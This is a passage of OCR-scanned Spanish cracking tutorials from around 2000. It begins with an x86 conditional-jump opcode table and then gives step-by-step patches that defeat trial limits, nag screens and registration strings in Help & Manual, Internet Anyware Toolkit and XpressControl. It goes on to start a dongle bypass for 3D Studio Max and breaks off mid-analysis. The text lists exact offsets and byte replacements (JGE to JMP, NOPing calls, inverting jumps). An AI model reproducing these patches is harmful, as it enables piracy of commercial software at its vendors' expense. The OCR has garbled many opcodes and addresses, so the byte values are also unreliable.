0r 82 cw/cd J 16/32 Salto cercano si carry (CF=1) 

0F 84 cw/cd JE rel16/32 Salto cercano si igual (ZF=1) 

OF 84 cw/cd JZ rel16/32 Salto cercano si 0 (ZF=1) 

OF 8F cw/cd JG rel16/32 Salto cercano si mayor (ZF=0 y SF=0F) 

OF 8D cw/cd JGE rel16/32 Salto cercano si mayor o igual (SF=0F) 

0Fr 8C cw/cd J 116/32 Salto cercano si menor (SF<>OF) 

0F 8E cw/cd J rell6/32 Salto cercano si menor o igual (ZF=1 o SF<>OF) 
0F 86 cw/cd J rel16/32 Salto cercano si no encima de (CF=1 o ZF=1) 

0F 82 cw/cd JNAE rel16/32 Salto cercano si no encima de o igual (CF=1) 

0Fr 83 cw/cd J rel1l6/32 Salto cercano si no debajo de (CF=0) 

0F 87 cw/cd J rel1l6/32 Salto cercano si no debajo de o igual (CF=0 y ZF=0) 
0Fr 83 cw/cd J rel16/32 Salto cercano si no carry (CF=0) 
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0F 85 cw/cd rel16/32 Salto cercano si no igual (ZF=0) 

0F 8E cw/cd rel1l6/32 Salto cercano si no mayor (ZF=1 o SF<>OF) 
0F 8C cw/cd E rel1l6/32 Salto cercano si no mayor o igual (SF<>0F) 
OF 8D cw/cd L rel16/32 Salto cercano si no menor (SF=0F) 

0Fr 8F cw/cd E rel16/32 Salto cercano si no menor o igual (ZF=0 y SF=0F) 
Or 81 cw/cd JNO rel16/32 Salto cercano si no overflow (OF=0) 

OF 8B cw/cd JNP rel16/32 Salto cercano si no paridad (PF=0) 

0F 89 cw/cd JNS rel16/32 Salto cercano si no signo (SF=0) 

0F 85 cw/cd JNZ rel16/32 Salto cercano si no cero (ZF=0) 

Or 80 cw/cd JO rel16/32 Salto cercano si overflow (OF=1) 

OF 8A cw/cd JP rel16/32 Salto cercano si paridad (PF=1) 

Or 8A cw/cd JPE rel16/32 Salto cercano si paridad igual (PF=1) 

Or 8B cw/cd JPO rel16/32 Salto cercano si paridad impar (PF=0) 

0Fr 88 cw/cd JS rel16/32 Salto cercano si signo (SF=1) 

OF 84 cw/cd JZ rel16/32 Salto cercano si 0 (ZF=1) 


z 
aTaDud»> 
cul 


Zazz3z az 


EB cb JMP rel8 Salto corto, relativo, desplazamiento rel a la siguiente instruccion 

E9 cw JMP rell6 Salto cercano, relativo, desplazamiento rel a la siguiente instruccion 

FF /4 JMP r/ml16 Salto cercano, absoluto indirecto, dirección determinada en r/ml6 

FF /4 JMP r/m32 Salto cercano, absoluto indirecto, dirección determinada en r/ml6 

EA cb JMP ptr16:16 Salto lejano, absoluto, dirección determinada en operando 

EA cb JMP ptr16:32 Salto lejano, absoluto, dirección determinada en operando 

FF /5 JMP m16:16 Salto lejano, absoluto indirecto, dirección determinada en m16:16 

FF /5 JMP m16:32 Salto lejano, absoluto indirecto, dirección determinada en m16:32 

estos son algunos, de los que me acuerdo ahorita, bueno continuemos !!! ya se desensamblo ? 


por que en la maquina que 
tengo una pentium 100 mhz con 48 en ram vaya que si tarda lleva casi 10 minutos y apenas va 
procesando los jmp addreses 


vaya Vaya !!! antes de continuar tengo que esperar que termine mmmmmm !! bueno regreso voy a 
echarme un TRAGO!!! 
mmmmm! !! que rico trago mmmmmmm!!! verdaderamente que rica es el AGUA DE LIMON !'mmmmm!!! me 


creerian que 

todavia no termina, que se me hace que me voy a cenar una torta española por cierto saludos 
a KArpoff !! AMIGISIMO !!!, 

BUENO YA REGRESE ahora si continuemos. 


Y | 
Una vez desensamblado no vamos a eh insertamos en la ventana que aparece 


Goto Code Location (32 Bit) 


la direccion de memoria que vimos en el Soft Ice que fue 54b601 y nos manda a la parte del 
codigo donde se 
encuentra el salto sospechoso : 


como podemos ver ese salto hace la comparación de que si es mayor o igual a 14 el programa 
ya no se ejecuta y continua con 

la siguiente linea, OK ! bueno que les parece si el JGE lo cambiamos por un salto 
incondicional JMP que salte no importando 

el valor que tenga salte!! como lo haremos , pues muy facil . vemos su offset que es: 


0014aa01 le sacamos una copia a el ejecutable del H8M y la copia la abrimos con el heditor 
hexadecimal en mi caso yo uso 
el Hexwork Shop y damos Control G e insertamos el offset y nos manda a 


00144394 (0088 0083 7850 007D OSEB EBO2 EDF (2 EP 
0014AA08/|6B03 E879 9CEE FF6B OJBA 74B7 5400|...y......t.T. 


y en la parte donde esta 007D05 solo cambiamos el 7D por EB y guardamos los cambios, vamos y 
probamos 

adelantando la fecha un mes mas o menos y ejecutamos el ejecutable modificado y damos click 
en el boton de OK! 

111! VOILA !!! limite de tiempo crackeado, ya solo nos falta quitar la molesta Nag Screen 
que sale al principio para 

hacer esto solo apuntamos el offset de la CALL que se encuentra tres lineas arriba del salto 


-OOS4BSEF SB00 mov eax, dword ptr [eax] 


:0054B5F6 A138025500 mov eax, dword ptr [00550238] 
:DO54B5FE 8B00D mov eax, dword ptr [eax] 
:0054B5FD 83785000 cmp dword ptr [eax+50], 00000000 
:0054B601 ?DO5 jge 0054B608 

:0054B603 ESESS2EBFF call 004038F0O 


el offset es: POffset 001449F1h in File: HelpMan.exe 


nos vamos al heditor hexadecimal y cambiamos solo los 5 bytes de la llamada (recuerden que 
para que funcione el 
cambio debes de cambiar si son 5 bytes por otros 5 bytes ) osea seria 


E8 = UN BYTE 

32 = UN BYTE 

79 = UN BYTE 

EE = UN BYTE 

Fr = UN BYTE 

5 BYTES EN TOTAL 

los cambiaremos por 5 bytes que anulen esta CALL que serian 9090909090 entonces vayamos a el 


editor 
hexadecimal y busquemos el offset 14A9F1 


0014A9EC | 0055 Mt a ceras Ale ass | loo o cto o olJalÚ) 


nos presenta la pantalla esto E83279EEFF y lo cambiamos y quedaria asi 


0014A9EC |0055 008B 0090 9090 9090 A138 0255|.U.........8.U 


una vez cambiado salvamos los cambios y ejecutamos el programa y LISTO PROGRAMA CRACKEADO 
pra 


solo falta quitar el string que sale al compilar un proyecto bueno para eso buscamos : THIS 
PROYEC WAS 

COMPILED WHIT A UNREGISTERED VERSION OF HELP AND MANUAL THIS DONT APPER IN A 

REGISTERED VERSION !!! en el editor hexadecimal y solamente lo borramos y LISTO AHORA SI 
PROGRAMA CRACKEADO!!!! 


bueno amigos terminamos espero que les sirva este tutorial, una cosa mas si gustas que tus 
tutoriales esten en la 

nueva compilacion de tutoriales, solo mandarmelos a mi email y yo me comunicare con ustedes. 
111 Y 

RECUERDEN ESTE TUTORIAL ES SOLO PARA AUMENTAR TUS CONOCIMIENTOS !!! SI TE GUSTA EL 
PROGRAMILLA !!! COMPRALO!!!! 


Profesor_X 


Karpoff Spanish Tutor 


Programa: Internet Anyware Toolkit v3.2.1 


PROTECCION: Serial, Nag, Limitacion de Tiempo 


Descripcion: Excelente Programa para realizar tareas de Hackers 


DN 


DOWNLOAD : 


Herramientas: Softice 3x+ W32dasm Editor Hexadecimal 
CRACKER: karpoff FECHA: 30/07/2000 


http: //www.tnsoft.com 


INTRODUCCION 


Tutorial de Crackeo Para Newbies desde Cero ik PROYECTO 18 HH 


Hola Newbies, como siempre estos manuales van dedicados a todos vosotros :) 


En esta ocasion jugaremos un poco con Internet Anyware Toolkit v3.2.1 , este programa 
es una excelente herramienta para empezar a hackear un poco tiene todo tipo de 
opciones, (Ping, Trace Routes, Scanear Puertos, Finger, Whols, Route Table y muchas 
mas opciones). 


la protección que tiene es un numero de serie, con una molesta nag de dialogo al 
arranque, y una limitación de 30 dias de uso. 


Que pretendo con este Manual ?? pues que aprendáis a tokitear el codigo de tal manera 
que se pueden hacer cosillas interesantes con la proteccion y obtener buenas Ideas a 
la hora de atakar otros programas mas complicados. 


AL ATAKE 


Por primera vez no me voy a perder en detalles del tipo de.... para buscar las strin ref. 
pulsamos el boton tal, para buscar una palabra.... pulsamos tal, creo que a estas alturas 
(Tutorial n* 18) todos sabeis de sobra manejar minimamente todas la herramientas y si tienes 
alguna duda consulta los manuales anteriores. 


Muy importante y siempre Lo primero de Todo, buena musica , paquete de tabaco, birras y 
demas enseres para entrar en trance "hooommmmmmmmmm" , vamos a Hacer una copia del 
ejecutable Toolkit.exe , y tenemos que obtener la maxima informacion sobre la victima para 
saber a que nos enfrentamos y no perder tiempo, a mi el File Analicer me dice esto. ( que no 
es poco :)) 


* File Analyzer Version DELUXE 

* Copyright (c) Vadim Tarasov ( 

* Homepage(1) - http://ww.world.lvu/unet 

* Homepage(2) - http://ww.fly.to/vadimlu 
Registered - karpoff 


TOOLKIT.ERXE 

Toolkit.exe 

933,888/D00E4000 € DOS >, 1,168/00000490 € HEADER > 

10:19:00 Jul, 26 of 2000 

PE-EXE. Win32 (WinHT and Win32s) portable executable file 

80386+ 

LINK - 6.0, 0S - 4.0, User - 0.0, Sybsystem - 4.0 

Windows GUI 

Image IsDLL (.) DebugStrip (.) IsExecutablet(x) 

RelocatStriptx) LineHumStriptx) LocSymbStriptx) 

32bit image (x) 16bit image (.) System file (.) 

0000000100001111 

Reserve - BO100000/00100000, Commit - 00001000/400001000 
InitDataSize : O009FODO, UninitDataSize : 00000000 

CodeSize 00045000, ImageSize := DODESO00 

LINK - 6.0, 0S - 4.0, User - 0.0, Sybsystem - 4.1 

Windows GUI 

Image IsDLL (.) DebugStrip (.) IsExecutablet(x) 

RelocatStrip(x) LineNumStriptx) LocSymbStripCx) 

32b1t image (x) 16bit image (.) System file (.) 

0000000100001111 

Reserve - D0100000/400100000, Commit - 00001000/00001000 

InitDataSize : O009FO00, UninitDataSize : 00000000 

CodeSize : 00045000, ImageSize = DONESO0O 

HeaderSize 00001000, OpHeaderSizetAHD: OOOOODEN 

BaselfCode = 00001000, BaselfData - 00046000 

Fileflignment: 00001000, SectionfAlignment: 00001000 

Hame VirtSize ERVA PhysSize PhysUOffs Flags 

.text 00044101 /00001000/00045000|00001000/|60000020 
.rdata DOOVESDA 00046000 |0000F000 ¡00046000 ¡40000040 
«data 00003308 ¡00055000 /|00003000|00055000|C0000040 
.Psre 00088648 |00059000/|0008C000|00058000/|40000040 


Processing file 
Large file name 
File sizes 
Created 

File structure 
Machine type 
Versions 
Subsystem 

Image Flags(1) 
Image Flags(2) 
Image Flags(3) 
Image Flags(bit) 
HeapStack 

Data Sizes 
Other Sizes(1) 
Versions 
Subsystem 

Image Flags(1) 
Image Flags(2) 
Image Flags(3) 
Image Flags(b1t) 


Other Sizes(1) 
Other Sizes(2) 


Processed with(1) 
DOSEXE part sizes: Header 64 bytes, image 1104 bytes, overlay 293272 bytes 
WINEXE part sizes: Header 4032 bytes, image 929856 bytes, overlay If bytes 
Entrypoint = DOS 64400000040, RUA 254312/0003E168, WIN 254312/0003E168 
Information(1) : Ouerlay start from 933888/D00£4000 

Extension ( 1): DOS executable file 


- Lo mas importante que no esta Empakado, que no esta Protegido contra desensamblado £ 
Debuger y que esta compilado con Visual C++ . Por lo tanto pasemos a desensamblar 
Toolkit.exe , el listado muerto lo guardamos como proyecto para evitar desensamblarlo 
nuevamente Cada vez que cerremos el desensamblador. 


- siguiente, Analicemos como se comporta el programa, osea que lo ejecutamos y nos fijamos 
bien en todas las caracteristicas, al arrancar aparece una nag de dialogo con las siguientes 
Caracteristicas: 


Thank-you for trying the Internet Anywhere Toolkit | 


This is the 30 day trial version of the Internet Anywhere Toolkit. You may 
evaluate this product for 28 more days. 


If you would like to enter a licence key for this program, please press the 
"Licence Now...” button. 


For more infomation on the Internet Anywhere Mail Server and other True 
North Software products and services, please visit our Web Site at 
http: 42. insoft.com 


Licence Now... | Later... [10 sec. ] | 


Como Caption (Titulo de la ventana) Welcome, un Icono, la bienvenida al programa las 
restricciones, y algo curioso el conteo de los dias de evaluacion, luego tenemos un boton con 
el texto Licence Now.. , que nos invita a meter el numero de registro, un segundo boton que 
pone Later..(15 sec) y que empieza una cuenta atras de 15 a 0 en medida de segundos, 
Adelanto que no vamos a ir a por el numero de serie ni a hacer un parcheo que nos acepte 
cualquier numero, vamos a jugar un poco con el codigo y se me ocurre manipular el codigo del 
boton que cuenta los segundos de tal manera que en vez de que tarde 15 segundos en iniciarse 
el programa alteremos el tiempo reduciendolo a lo minimo, asi cuando arranquemos el programa 
se abrira y se autocerrara en el acto la nag, entrando directamente al programa. 


- Este tipo de eventos es manejado por alguna funcion como settimer, Gettimer etc. y como en 
un programa hay cientos de eventos relacionados con el tiempo se me ocurre buscar la 
etiqueta de boton como Cadena de texto, osea Later.. (%D sec.) , asi que metemos en la 
opcion de busqueda del desensamblador la palabra Later y procedemos a su localizacion :), he 
encontrado 3 coincidencias pero me parece de especial interes esta, por estar junto a la 
funcion SetTimer. 


* Posible Reference to String Resource ID=01000: "User Tool 1" 
:00435BED 68E8030000 push 000003E8 

:00435BF2 6A01 push 00000001 

:00435BF4 51 push ecx 

:00435BF5 C744242000000000 mov [esp+20], 00000000 


* Reference To: USER32.SetTimer, Ord:0252h 
:00435BFD FF15FC6B4400 Call dword ptr [00446BFC] 
:00435C03 8B5664 mov edx, dword ptr [esi+64] 
:00435C06 8D442404 lea eax, dword ptr [esp+04] 
:00435C0A 52 push edx 


* Possible Reference to String Resource ID=00108: "Later... ( $1!d! sec. )" 


:00435C0B 6A6C push 0000006C 
:00435C0D 50 push eax 


- Bueno hemos localizado la Etiqueta del boton (Later... ( $1!d! sec. )"), y la funcion que 
maneja el evento de tiempo, ahora mis pobres conocimientos de programacion me dicen que el 
tiempo en programacion se utiliza en milisegundos osea 1000 = 1 segundo, se me ocurre 


localizar el contador que tiene que estar muy cerquita ya que tenmos la funcion SetTimer y 
la Etiqueta del Boton en este codigo, bueno pues busquemos 1000 en Hexadecimal que es 3E8, y 
como veis en el codigo que tenemos encima encontramos la coincidencia. 


* Possible Reference to String Resource ID=01000: "User Tool 1" 
:00435BED 68E8030000 push 000003E8 -- Medida en Milisegundos 
:00435BF2 6A01 push 00000001 

:00435BF4 51 push ecx 

:00435BF5 C744242000000000 mov [esp+20], 00000000 


Que creeis que puede pasar si en vez de que el contador se base en 1000 Mlsegundos para 
hacer un segundo, se base en Cero Mlsegundos :), Como hacer esto?? Pongamos el Push a Cero, 
cambiamos: 


:00435BED 68E8030000 push 000003E8 Por :00435BED 6A00909090 push 000000000 


Para realizar los cambios ya sabeis, localizar el offset de la linea a modificar, y con el 
Editor Hex parcheais. 


Hemos puesto como medida de tiempo 0 osea que ahora el programa hara 15 eventos de 0 tiempo, 
con lo cual el nag desaparecera nada mas iniciar el programa, tambien para seguir 


jugueteando podriamos manipular el manejador de 15 eventos y ponerlo a cero, si os apetece 
2... 


Quizas todo esto os parezca una tonteria, pero yo pienso que esta muy bien saber este tipo 
de cosillas, que nos pueden ser muy utiles con otros programas y esta muy bien jugar con el 
codigo para buscar diferentes formas de atakes, segun Juegas te vienen ideas a la cabeza hay 
que sentirse comodo con el codigo, obserbarlo, ver como funciona y experimentar. 


=-- A por el Nag --- 


Bueno ahora vamos a atkar al Nag directamente, segun he obserbado el codigo, estoy Casi 
seguro que evitando el inicio del Nag, evitaremos tambien que caduque el programa en 30 
dias, Como he llegado a esta conclusion ?? pues parece ser que tanto el codigo del Nag como 
el de la limitacion de tiempo estan asociados entre si, osea que si sale el nag, el programa 
cuenta los dias de evaluacion y si evitamos el nag, no cuenta nada, de todas maneras 
enseguida lo comprobaremos. 


Bueno Empecemos, localizaremos el codigo del nag mediante su Caption (Titulo) Welcome, 
Pulsemos la opcion de busqueda y metemos la palabra Welcome y veamos las coincidencias, 
enseguida nos aparece esta linea que es de lo mas interesante, 


Name: DialogID_00D2, + of Controls=005, Caption:"Welcome", ClassName:"" 


Suficiente para nosotros, tenemos que el Caption es manejado por el DialogID_00D2 que es el 
que lanzara el welcome, asi que a buscar el dialogo, realizamos la busqueda metiendo como 
busqueda DialogID_00D2 y enseguidita aterrizamos en: 


* Possible Reference to Dialog: DialogID_00D2 
:004358AF 68D2000000 push 000000D2 
:004358B4 89742410 mov dword ptr [esp+10], esi 


Cuando la ejecucion del programa llegue a esta parte del codigo, se empezara a crear el Nag 
y seguido lo lanzara, asi que a mi se me ocurre poner un punto de ruptura (break Point) un 
poco antes de estas lineas de codigo y analizar con softice o TRW2000 que instruccion lanza 
el Nag, bueno encima de este codigo tenemos lo siguiente: 


* Possible Reference to Dialog: DialogID_008E, CONTROL_ID:00FF, "JN " 
:00435890 GAFF push FFFFFFFF -- Pongamos un Brak Point aqui -- 
:00435892 6851434400 push 00444351 

:00435897 64A100000000 mov eax, dword ptr fs: [00000000] 

:0043589D 50 push eax 


Pues a lo dicho vamos a poner un Break Point en 00435890 para obserbar en que momento se 
lanza el Nag, Corremos Toolkit.exe y de inmediato entramos en softice en el bp que hemos 
puesto, vamos ejecutando el programa paso a paso con F10 hasta que nos salte el Nag , 
F10...F10..ETC. y splanch aparece nuestro nag, quien lo lanzo?? pues esactamente: 


* Reference To: MFC42.0Ordinal:09D2, Ord:09D2h 


:00427EDB E8266B0100 Call 0043EA06 --—- Lanza El Nag --- 
:00427EE0 83F801 cmp eax, 00000001 


T 


T 
5] 


:00427EE3 0F85A5000000 jne 00427F8]1 
:00427EE9 8D8C24E8000000 lea ecx, dword ptr [esp+000000E8] 
:00427EF0 89BC24F4000000 mov dword ptr [esp+000000F4], edi 


T 


Vamos a buscar este codigo en el Listado muerto y veamos si hay alguna manera de evitar que 
pase por :00427EDB E8266B0100 Call 0043EA06 Lo mas interesante que aparece es el siguiente 
salto que va directo a la llamada que lanza el nag 


* Possible StringData Ref from Data Ob3j ->"Toolkit" 

:00427E94 6854574500 push 00455754 

:00427E99 E802B5FFFF call 004233A0 

:00427E9E 83C40C add esp, 0000000€ 

:00427EA1 3DCF070000 cmp eax, 000007CF 

:00427EA6 8D4C2440 lea ecx, dword ptr [esp+40] 

:00427EAA 742F je 00427EDB -- Directo a la Call que lanza el Nag -- 


* Reference To: MFC42.Ordinal:09D2, Ord:09D2h 


:00427EAC E8556B0100 Call 0043EA06 -- OTro que tambien lanza el Nag -- 
:00427EB1 83F801 cmp eax, 00000001 

:00427EB4 0F858E000000 jne 00427F48 

:00427EBA 8D8C24E8000000 lea ecx, dword ptr [esp+000000E8] 

:00427EC1 C78424F400000002000000 mov dword ptr [esp+000000F4], 00000002 


Bueno Tenemos el salto 00427EAA je 00427EDB que si se ejecuta nos manda directos a la call 
que hemos localizado como responsable de que salga el Nag, comprobamos con softice y 
efectivamente cuando la ejecucion del programa llega a el salto este se ejecuta asta 
00427EDB Call 0043EA06 , pero supongo que estareis viendo y pensando lo mismo que yo, si 
anulamos el salto de tal manera que nunca se llegue a ejecutar no hacemos nada, por que con 
la primera instruccion que se encuentra es con otra llamada exacta a la que nos lanzo el nag 
, fijaros en las dos 


:00427EDB E8266B0100 Call 0043EA06 --- El call que lanza el nag --- 


:00427EAC E8556B0100 Call 0043EA06 --- Y este seguro que hace lo mismo, fijaros en la 
direccion a la que apunta , es la misma que el anterior, osea que con el salto que teniamos 
localizado no podemos hacer nada, ya que de cualquier forma, se ejecute o no.. van a ir a 
parar al mismo sitio, a presentarnos el nag de inicio, Entonces busquemos algo que pueda 
evitar las dos call, mirando un poco mas arriba tenemos un salto que si nos libra las dos 
instrucciones, 


* Possible StringData Ref from Data Obj ->"Toolkit" 


:00427E54 6854574500 push 00455754 

:00427E59 E8SC2B1FFFE call 00423020 

:00427E5E 83C410 add esp, 00000010 

:00427E61 3DCF070000 cmp eax, 000007CF 

:00427E66 BBO5000000 mov ebx, 00000005 

:00427E6B 0F845C010000 je 00427FCD -- Este mismo, sera el que nos ayude --— 
:00427E71 BF06000000 mov edi, 00000006 


Pues bueno solo tenemos que invertir el salto y ver los resultados, yo ya lo he probado con 
softice y es perfecto, bueno cojemos el Offset del salto y nos vamos a nuestro Editor Hex y 
procedemos a parchearlo de tal manera que quede asi 


:00427E6B 0F845C010000 je 00427FCD Cambiar Por 


:00427E6B 0F855C010000 jne 00427FCD 


y ya no tenemos ninguna nag molesta. 


Y que pasa con la limitacion de 30 Dias, Como ya comente antes , la Nag y Los dias de 
Evaluacion estan relacionados, si hay nag el programa va contando los dias, si no hay nag es 
lo mismo que si hubiesemos metido el numero de serie valido. 


Programa: 


Karpoff Spanish Tutor 


XpressControl 3.0 


Versión trial con Limitacion de 


PROTECCION: ] 
Tiempo a 30 dias 
La app XpressControl de TomaWeb Remote Control Software permite acceder y 
tomar el control de un PC distante y de todos sus recursos, desde cualquier 
lugar en que uno se encuentre. 
Este control remoto se puede lograr a través de Internet o 
bien dentro de una red corporativa, a través de firewalls. 
Se pueden transferir archivos, ejecutar aplicaciones, operar 
con el teclado o el mouse, observar las operaciones del 

Descripcion: usuario remoto, etc. 
Tiene una velocidad de respuesta muy alta y su tamaño 
pegueño lo hace ideal para controlar un gran número de 
equipos. Incluye tres ejecutables: el Support Engineer 
Desktop (aplicación principal), el Connection Wizard y el 
Remote Host. 

Dificultad: Principiante 

DOWNLOAD: http://freeware32.efront.com/file/browsers21.htm 

Herramientas: Softice, W32dasm, Editor Hexadecimal 

CRACKER: 


NickyAC FECHA: 08/08/2000 


INTRODUCCION 


Al iniciarse la app principal se presenta una pantalla en la que los autores (TomaWeb 
Remote Control Software) agradecen el uso de esta versión de evaluación. Además se 
indican los días que quedan disponibles para continuar usando el software. 


Después de darle el clic al botón OK se muestra la pantalla 
principal y, en forma breve, otra en la que además de los créditos 
de los autores, se nos recuerda que esta versión es de Evaluación y 
nos indican el camino para hacer la compra correspondiente. 

Una vez que desaparece esta pantalla la app está disponible con 
todas sus opciones. 

Obviamente, al pasar de los días, una nueva instalación conservará 
el conteo de los que hayan transcurrido desde la primera 
instalación. 

Además existe el mensaje “Evaluation” en los tres ejecutables. 


AL ATAKE 


La forma de atacar la protección fue confirmar, en primer lugar, la presencia de la rutina 
comprobadora del tiempo transcurrido mediante el Softice (versión 4.05), luego seguirle la 
pista con el W32Dasm y, finalmente, hacer las modificaciones necesarias en el código 
mediante un Editor Hexadecimal. 


a) App Support Engineer: 


La bpx GetLocalTime muestra dos apariciones de esta rutina que anteceden a 
la de la ventana con los dias restantes: 00407B54 y 00407B80. Al usar el 
W32Dasm aparecieron tres lugares en que había referencia a la rutina: 
00405618, 00407B54 y  00407B80. 

Al retroceder a la dirección de llamada de la rutina y luego a la 
dirección de cada segmento de código correspondiente el resultado fue el 
siguiente: (la dirección entre paréntesis es la del inicio del trozo del 
código en el que está la llamada; los guiones significan que coincide con 
este inicio; la dirección que aparece a continuación de los dos puntos es 
la dirección desde la que se hace referencia al inicio anterior): 


405618  (-----=-=-- ): 407B54 (407B4C): 407BAF (407BAC): 455ACB (455AA8): 452A04 
407B80 (407B78): 407BB9 (407BAC): 455ACB 


La primera dirección que muestra el W32Dasm presenta enseguida las otras 
dos que mostró el Softice; al seguirles su recorrido hacia atrás, ambas 
presentan una referencia común (455ACB) y ésta al llegar a su referencia 
(452A04) presenta el siguiente segmento de código: 


:004529F9 80BB9003000000 cmp byte ptr [ebx+00000390], 00 
:00452A00 7407 je 00452A09 

:00452A02 8BC3 mov eax, ebx 

:00452A04 E89F300000 call 00455AA8 


Por lo tanto, para eliminar el recorrido anterior y no Caer en el 
“control” de tiempo, bastará con saltarse el llamado que se ve en 00452A04 
y pasar directamente a la dirección 00452A09. Para esto sólo se necesita 
modificar el salto condicional a esta última dirección por uno 
incondicional, cambiando la instrucción “7407 por EBO7. 


b) App Connection Wizzard: 


La situación es parecida a la anterior. Las direcciones de la rutina 
son: 0040564C 
00407D90 00407DBC. El seguimiento es el siguiente: 


40564C  (------ ): 407D90 (407D88): 407DEB (407DE8): 4471D6 
447200 
44 7DCF (447DAC): 
444DEF 407DBC (407DB4): 407DF5 
(407DE8)... 


De las tres direcciones finales, las dos primeras se encuentran en 
segmentos de código que no muestran relación con el control de tiempo, 
mientras que la última lleva al segmento siguiente, semejante al de la 
aplicación anterior: 


:00444DE4 80BBF002000000 cmp byte ptr [ebx+000002F0], 00 
:00444DEB 7407 je 00444DF4 

:00444DED 8BC3 mov eax, ebx 

:00444DEF E8B82F0000 call 00447DAC 


Un razonamiento similar al anterior lleva a modificar el salto condicional 
a la dirección 444DF4 por uno incondicional, cambiando la instrucción “7407 
por EBO7. 


Cc) App Remote Host: 


Las direcciones de la rutina son: 004054BC, 00407900 y 0040792C. El 
seguimiento es: 


4054BC  (------ ): 407900 (4078F8): 40795B (407958): 443563 (443540): 442ED”7 
40792C (407924): 407965 (407958) 


:00442ECC 80BB5C02000000 cmp byte ptr [ebx+0000025C], 00 
:00442ED3 7407 je 00442EDC 

:00442ED5 8BC3 mov eax, ebx 

:00442ED7 E864060000 call 00443540 


Al igual que en los casos anteriores, bastará con modificar el salto 
condicional a la dirección 442EDC por uno incondicional, cambiando la 
instrucción 7407 por EBO7. 

Una última modificación “cosmética” será eliminar el letrero Evaluation 
que se muestra en cada una de las aplicaciones anteriores. El editor 
hexadecimal HexWorkshop u otro semejante permite hacer esto sin problemas. 
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INTRODUCCION 


E, este tutorial tratamos de nuevo las mochilas, el objetivo es el 3D Studio Max V3.0. He de decir que me ha 


defraudado bastante el sistema de protección, parece más una broma que no otra cosa. En menos de media hora 
puedes crackear el programa, es ridiculo, incluso he tardado mucho más en escribir este tutorial. Hasta se puede 
prescindir del Softlce para crackear el programa, con sólo usar el IDA y un poco de inteligencia habriamos llegado 
al crack final. Me parece patético.He encontrado muchas aplicaciones shareware mejor protegidas y además sin 
que estas utilizen ningún tipo de mochila. Esto me lleva a pensar el dinero que gastán en mochilas, para luego 
proteger de esta manera, es extraño que tan preocupados que son ellos para el dinero, no se den cuenta de como 
lo están tirando. Me sentiría muy avergonzado si malgastara mi dinero en un software que está protegido de tal 
manera y además resulta tan caro. 

De nuevo se demuestra que no importa lo caro que sea un programa, la vagancia de los programadores (en este 
caso de Autodesk) se pone de nuevo de manifiesto. A veces intento dar una explicación al porqué de estas 
inofensivas protecciones,quizas son las prisas por sacar cuanto antes una nueva versión, o quizas no protegen 
mejor para que su software sea crackeado rápidamente y se convierta así en el más utilizado (curiosa 
técnica de marketing), no se, no entiendo el porqué... sólo se que alguien dijo: es una mala protección, entonces es 
un mal programa. 


AL ATAKE 


Bueno primero vamos a utilizar el metodo del trazado a lo retro, si no sabes de que va, mirate mi tutorial génerico sobre 
mochilas. Antes de comenzar sería bueno desensamblar el ejecutable , yo le he intentado desensamblar con el W32Dasm 
pero no funciona (el programa se ejecuta sólo antes de desensamblarse, como es posible? ), de todas maneras no importa 
ya que siempre disponemos del IDA, que en estos casos nunca falla :). Pues nada desensamblamos el archivo y guardamos 
el resultado para su posterior uso. 

Luego ejecutaremos el 3DMax, nos aparece la pantalla de inicio y posteriormente un mensaje de error que dice algo así: 


* El bloqueo de hardware no está conectado o no es válido bla bla... ' 


Pulsa aceptar, bueno parece que no tenemos la mochila reglamentaria, pero esto tiene fácil solución, activamos el Softlce y 
pones un breakpoint sobre la funcion MessageBoxaA con: 


> BPX MessageBoxA 


- Ahora ejecutamos el 3DMax y veremos que el Softlce se activa antes de mostrar el cuadro de error, pulsamos F12 para ir a 
la linea de código donde se llamó a MessageBoxaA y veremos al así : 


0046977C loc_46977C: ; CODE XREF: sub_469610+155 j 
0046977C call sub_5C3910 
00469781 and eax, OFFFFh 
00469786 test eax, eax 
00469788 ¡z short loc_4697FA 
0046978A mov ecx, [esp+10h] 
0046978E dec ecx 

0046978F test ecx, ecx 
00469791 mov [esp+10h], ecx 
00469795 jg short loc_469742 
00469797 test eax, eax 
00469799 ¡z short loc_4697FA 
0046979B mov eax, dword_5F3740 
004697A0 test eax, eax 
004697A2 jz short loc_4697B5 
004697A4 push 1025h 
004697A9 call sub_414DA0 
004697AE push eax 
004697AF call ds:KillTimer 
004697B5 

004697B5 loc_4697B5: ; CODE XREF: sub_4697A2 
004697B5 xor ebx, ebx 
004697B7 call edi 

004697B9 mov eax, [eax] 
004697BB push OFFh 
004697C0 lea ecx, [esp+18h] 
004697C4 push ecx 
004697C5 push 2 

004697C7 push eax 
004697C8 call esi 

004697CA call edi 

004697CC mov eax, [eax] 
004697CE push OFFh 
004697D3 lea edx, [esp+118h] 
004697DA push edx 
004697DB push OEA81h 
004697E0 push eax 

004697E1 call esi 

004697E3 push 2010h 
004697E8 lea eax, [esp+18h] 
004697EC push eax 
004697ED lea ecx, [esp+11Ch] 
004697F4 push ecx 

004697F5 push ebx 


004697F6 call ebp -> Llama al cuadro de mensaje 

004697F8 ¡mp short loc_4697FE - -> y salta más abajo !! ESTAMOS AQUÍ !! 
004697FA loc_4697FA: ; CODE XREF: sub_469788 y sub_469799 
004697FA test ebx, ebx -> comprueba si EBX es 0 

004697FC ¡nz short loc_46980B  -> no, salta 

004697FE 


004697FE loc_4697FE: ; CODE XREF: sub_4697F8 


004697FE call sub_403A00 -> llamada a una función 
00469803 push O 

00469805 call ds:ExitProcess -> Sale del programa 
0046980B -> el siguiente código sólo se ejecuta si se salta desde 4697FC 
0046980B loc_46980B: ; CODE XREF: sub_4697FC 
0046980B pop esi 

0046980C pop ebp 

0046980D pop edi 

0046980E mov eax, ebx 

00469810 pop ebx 

00469811 add esp, 608h -> restaura la pila 
00469817 retn -> y continua el programa 
00469817 sub_469610 endp 


Bueno, examinando este código podemos comprobar como después de mostrar el mensaje de error, se nos desvia a 
mediante un salto incondicional a 4697FE, donde se termina la aplicación mediante la función del Kernel ExitProcess. Si 


miramos el código que nos ofrece el desensamblado del ejecutable, veremos que sólo hay dos maneras de esquivar la 
llamada a ExitProcess. La primera es pasar por el código en 4697FA, este código es referenciado por las líneas de código 
469788 y 469799 tal y como nos indica el IDA. La segunda la encontramos por debajo del salto incondicional en la línea de 
código 469808 la cual es referenciada por la línea 4697FC.Esta última línea está por debajo de 4697FA, de lo cual se 
deduce que la única manera de esquivar el códigoque sale del programa es pasar por aquí. Como he dicho antes, la única 
manera de llegar aquí es mediante un salto en las lineas 469788 y 469799. Examinemos primero el salto en 469788 ya que 
